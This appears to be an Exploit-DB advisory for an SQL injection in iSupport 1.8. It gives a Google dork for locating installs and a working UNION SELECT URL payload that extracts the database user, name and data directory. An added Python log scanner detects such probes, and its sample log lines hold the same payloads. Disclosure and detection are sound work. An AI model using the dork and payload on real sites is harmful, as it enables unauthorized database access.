iSupport 1.8 – SQL Injection

  • Author: Brendan Coles
    Date: 2011-06-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17436/
  • iSupport 1.8 SQL Injection Vulnerability
    
    # Date: 2011-06-23
    # Author: Brendan Coles <bcoles@gmail.com>
    # Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/
    
    # Software: iSupport
    # Version: <= 1.8
    # Homepage: http://www.idevspot.com/iSupport.php
    # Google Dork: "Powered by [ iSupport 1.8 ]"
    
    # Vendor: idevSpot
    # Homepage: http://www.idevspot.com/
    # Notified: Unnotified
    
    # SQL Injection:
    
    http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--
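
Added example (not part of the original advisory or of iSupport's code): a Python check a defender can run over web access logs to flag requests whose x_category parameter carries SQL syntax, including layered URL-encoding. The log lines, the /support/ path and the token list are constructed assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines for illustration; /support/ is a placeholder path.
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jun/2011:10:00:01 +0000] "GET /support/index.php?include_file=knowledgebase_list.php&x_category=3 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [23/Jun/2011:10:00:05 +0000] "GET /support/index.php?include_file=knowledgebase_list.php&x_category=null+union+select+null,concat(user(),0x3a,database()),null-- HTTP/1.1" 200 4890',
    '198.51.100.9 - - [23/Jun/2011:10:00:09 +0000] "GET /support/index.php?include_file=knowledgebase_list.php&x_category=1%2520UNION%2520SELECT%2520null HTTP/1.1" 200 4890',
    '198.51.100.7 - - [23/Jun/2011:10:00:12 +0000] "GET /support/style.css HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that have no place in a category value (heuristic chosen for this example).
SQL_TOKENS = re.compile(r"\b(?:union|select|concat|sleep|benchmark)\b|--|/\*|@@|\b0x[0-9a-f]+", re.I)

def decode_fully(value, max_rounds=3):
    """Undo layered URL-encoding (e.g. %2520) so the check sees the final text."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_x_category(log_line):
    """Return the decoded x_category value if it carries SQL syntax, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    for raw in params.get("x_category", []):
        value = decode_fully(raw)
        if SQL_TOKENS.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    checked = ((n, suspicious_x_category(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in checked if value is not None]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious x_category={value!r}")
```

A hit in the logs only shows that the parameter was probed; the response size and status for the same request help decide whether data was returned.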